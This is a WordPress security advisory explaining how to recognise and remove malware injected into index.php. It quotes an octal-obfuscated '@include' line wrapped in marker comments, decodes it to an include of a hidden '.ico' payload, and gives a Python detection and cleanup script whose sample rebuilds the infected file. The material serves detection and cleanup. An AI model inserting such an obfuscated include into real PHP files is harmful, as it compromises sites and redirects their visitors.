If you find the following code in any index.php file on your WordPress site, the site is infected with malware and you should be careful.

Malware that alters index.php and runs no matter which page of the WordPress site is loaded

If the index.php file contains @include "\057v\151r\164u\141l\0571 with comments such as /*963c2*/ directly above and below the include statement, that code loads the malware itself.

This code is obfuscated; once deobfuscated, it reads as follows.

@(include "/virtual/.24b5f368.ico");

This code loads the malware body, .24b5f368.ico, which makes the site perform malicious actions, such as redirecting visitors to another site.

The random-string comments such as /*963c2*/ at the top and bottom let the hackers check whether they have already embedded malware in that file.

Remediation

If you find such a file on your site, immediately delete the line containing @(include "/virtual/" and the random-string comments above and below it, then re-upload index.php.

Additionally, we recommend running a site-wide file and database malware scan with the [Free] WordPress: Malware Scanning & Security Plug-in [Malware and Virus Detection and Removal].

Change user passwords, etc.
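
The check and cleanup described above can be scripted. The following is an added example, not code from the original page: it finds an include sandwiched between matching marker comments, decodes the escaped path, and returns the source with the block removed. The function names, the marker pattern (a short hex-like token repeated identically above and below) and the sample file are assumptions made for the illustration.

```python
import re

# Marker comment, an @include / @(include ...) of a quoted string, then the
# same marker again. Assumption: the marker is a short hex-like token repeated
# identically above and below the include, as the page describes.
BLOCK_RE = re.compile(
    r'/\*(?P<tag>[0-9a-f]{4,8})\*/\s*'
    r'@\s*\(?\s*include\s*\(?\s*"(?P<path>(?:\\.|[^"\\])*)"\s*\)?\s*\)?\s*;\s*'
    r'/\*(?P=tag)\*/',
    re.IGNORECASE,
)

# Escapes PHP expands in a double-quoted string: \ooo (octal), \xhh (hex), \\.
ESCAPE_RE = re.compile(r'\\(?:([0-7]{1,3})|x([0-9A-Fa-f]{1,2})|(\\))')


def decode_php_escapes(s):
    """Decode octal and hex escapes the way PHP does in a "..." string."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8) & 0xFF)  # PHP wraps values > 0377
        if m.group(2) is not None:
            return chr(int(m.group(2), 16))
        return '\\'
    return ESCAPE_RE.sub(repl, s)


def scan_php(source):
    """Return ([(marker, decoded_path), ...], source_with_blocks_removed)."""
    hits = [(m.group('tag'), decode_php_escapes(m.group('path')))
            for m in BLOCK_RE.finditer(source)]
    return hits, BLOCK_RE.sub('', source)


# Constructed sample: a stock-looking index.php with an injected block. The
# marker and decoded path are the ones quoted on this page; the octal encoding
# of the full path is made up for the demo.
SAMPLE = r"""<?php
/*963c2*/

@include "\057v\151r\164u\141l\057.\0624\142\065f\0636\070.\151c\157";

/*963c2*/
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
"""

if __name__ == '__main__':
    hits, cleaned = scan_php(SAMPLE)
    for marker, path in hits:
        print(f'injected include, marker /*{marker}*/ -> {path}')
```

Run it over every index.php under the site root and review each hit before writing the cleaned source back; the decoded path also tells you which dropped file to delete.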